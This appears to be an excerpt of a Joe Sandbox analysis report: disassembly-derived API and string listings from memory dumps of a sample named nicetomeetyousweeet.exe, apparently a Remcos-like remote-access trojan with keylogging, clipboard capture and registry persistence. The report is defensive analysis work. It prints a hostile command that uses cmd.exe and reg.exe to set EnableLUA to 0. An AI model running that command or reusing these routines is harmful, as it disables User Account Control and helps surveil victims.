                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                • String ID: @CG$exepath
                                                                                • API String ID: 1913171305-1253070338
                                                                                • Opcode ID: 7fefd4fcae7e0ef6d55ce9d204f1d3822a483be89a92adb2579d4a357fc0ee6e
                                                                                • Instruction ID: 2e0e5bca530a04888f282ebfae55573a7e355b8783f1925ff9fdd176e47777eb
                                                                                • Opcode Fuzzy Hash: 7fefd4fcae7e0ef6d55ce9d204f1d3822a483be89a92adb2579d4a357fc0ee6e
                                                                                • Instruction Fuzzy Hash: 40418532A84118DACB14FB64DC5AEFE7779AF50701F500169F406A3193EF285E47CB95
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000104), ref: 007C297B
                                                                                • _free.LIBCMT ref: 007C2A46
                                                                                • _free.LIBCMT ref: 007C2A50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: (7h$C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe
                                                                                • API String ID: 2506810119-1637841345
                                                                                • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                • Instruction ID: 4a27e7c5fba48d0a6164d6715161bf2f974f4d3a9223ceafbaa9df110ea07ea7
                                                                                • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                • Instruction Fuzzy Hash: 2D316671A01618EFCB21DF599C85F9EBBFCEB45310F10406EE905A7212D6745E42C750
                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 007940ED
                                                                                • LoadLibraryA.KERNEL32(?), ref: 0079412F
                                                                                • LoadLibraryA.KERNEL32(?), ref: 0079418E
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 007941B6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressDirectoryProcSystem
                                                                                • String ID: g<A
                                                                                • API String ID: 4217395396-3237022798
                                                                                • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                • Instruction ID: c753012073186ebc303f2dde2abe404ff5bed351bfb4f218941d96f4a18e670e
                                                                                • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                • Instruction Fuzzy Hash: A931FAB1945319ABD720EB24EC48E9F77DCEF44794F044929F844D3201E778D9818BEA
                                                                                APIs
                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                • API String ID: 2974294136-753205382
                                                                                • Opcode ID: f9ce729fc68a8e54cedf029c1ca87353c365b71fd45938a9d20d4a412a6221dd
                                                                                • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                • Opcode Fuzzy Hash: f9ce729fc68a8e54cedf029c1ca87353c365b71fd45938a9d20d4a412a6221dd
                                                                                • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                • wsprintfW.USER32 ref: 0040A905
                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EventLocalTimewsprintf
                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                • API String ID: 1497725170-248792730
                                                                                • Opcode ID: 7416a7beddcc99ce8dbcdefecb6347c9b5b607241f8dba009b026989dc958aec
                                                                                • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                • Opcode Fuzzy Hash: 7416a7beddcc99ce8dbcdefecb6347c9b5b607241f8dba009b026989dc958aec
                                                                                • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                • String ID: `AG
                                                                                • API String ID: 1958988193-3058481221
                                                                                • Opcode ID: 4ebf0acc99a1bd76ecb676338ad5ca66b749e389f9c6bdc81adf82034e374675
                                                                                • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                • Opcode Fuzzy Hash: 4ebf0acc99a1bd76ecb676338ad5ca66b749e389f9c6bdc81adf82034e374675
                                                                                • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                APIs
                                                                                • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                • GetLastError.KERNEL32 ref: 0041CA91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                • String ID: 0$MsgWindowClass
                                                                                • API String ID: 2877667751-2410386613
                                                                                • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                APIs
                                                                                • RegisterClassExA.USER32(00000030), ref: 0079CCD3
• CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0079CCEE
• GetLastError.KERNEL32 ref: 0079CCF8
Memory Dump Source
• Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
Similarity
• API ID: ClassCreateErrorLastRegisterWindow
• String ID: 0$MsgWindowClass
• API String ID: 2877667751-2410386613
• Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
• Instruction ID: 40102a1df2c1d072663dacaacd60728356b14cae04bb7ee58e7eff36dab19d78
• Instruction Fuzzy Hash: 8501E5B1D1421EAB9B01DFEAEDC49EFBBBDBE49255B50453AE410B2100E7709A448BA4

APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
• CloseHandle.KERNEL32(?), ref: 00406A0F
• CloseHandle.KERNEL32(?), ref: 00406A14
Strings
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
• C:\Windows\System32\cmd.exe, xrefs: 004069FB
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
• Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
• Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
• Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9

APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002), ref: 004425F9
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
• FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000), ref: 0044262F
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
• Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
• Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C

APIs
• RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
• RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
• RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc$BG
• API String ID: 1818849710-2233081382
• Opcode ID: 7b30edb4b73959b963a827f55bfb040984e2e784fd155cea8a61af405a6566e3
• Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
• Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4

APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
• Opcode ID: 8aa150007e8bf14f7c51783879dca455fdcc96e85f7bfc2b73a29f2336cb496a
• Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
• Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B

APIs
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
• PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
• Sleep.KERNEL32(00002710), ref: 00419F79
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
• Opcode ID: b6a31acd189e4046641eb45152315503d0aef81ef7f0fd696b7e402a16cb71a5
• Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
• Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB

APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
• GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
• SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
• Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
• Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
• Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79

Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
• Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
• Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9

Memory Dump Source
• Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
Similarity
• Opcode ID: e2c0e9d55fcd13551ec2678028d06ddb1c515a5452d77a18986bab3fa9fe77ab
• Instruction ID: 926e15e796636d2f79c7e6a25747ddab6cec719cb10788d27c6a016607e4424a
• Instruction Fuzzy Hash: EE719C31900256DBCB218FA4D884FBFBB75EF95320F24422DE951A7181D7788DA1CBE1

APIs
  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
• GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
• HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
• SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
• API String ID: 3525466593-0
• Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
• Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
• Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99

Memory Dump Source
• Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
Similarity
• API ID: _free$AllocateHeap
• API String ID: 3033488037-0
• Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
• Instruction ID: 4896d5451c863e914be1f156b1f4c5b5aa38a38608969b1be4d3badabb09c323
• Instruction Fuzzy Hash: E0518E32A00608EFDB20DF69D852FAA77F5FB59720B14466DE809EB251E739DD41CB80

APIs
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
  • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
• CloseHandle.KERNEL32(00000000), ref: 0040E8AB
  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
  • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• API String ID: 2180151492-0
• Opcode ID: dfac8ff653820aa2ab6d508390a1137ba5fb2a73f2ca9f5feaa092644f312b56
• Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
• Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                • Instruction ID: c82eb73510f99976d0e3a82697a6de468fda19a7550a363064d6d50746aac493
                                                                                • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                • Instruction Fuzzy Hash: B2419032A00214EBCB24DF78C885F6DB7A6EF88714B1585ADE515EB391DA35AE01CB40
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                • __freea.LIBCMT ref: 0044FFC4
                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                • String ID:
                                                                                • API String ID: 313313983-0
                                                                                • Opcode ID: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                • Opcode Fuzzy Hash: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
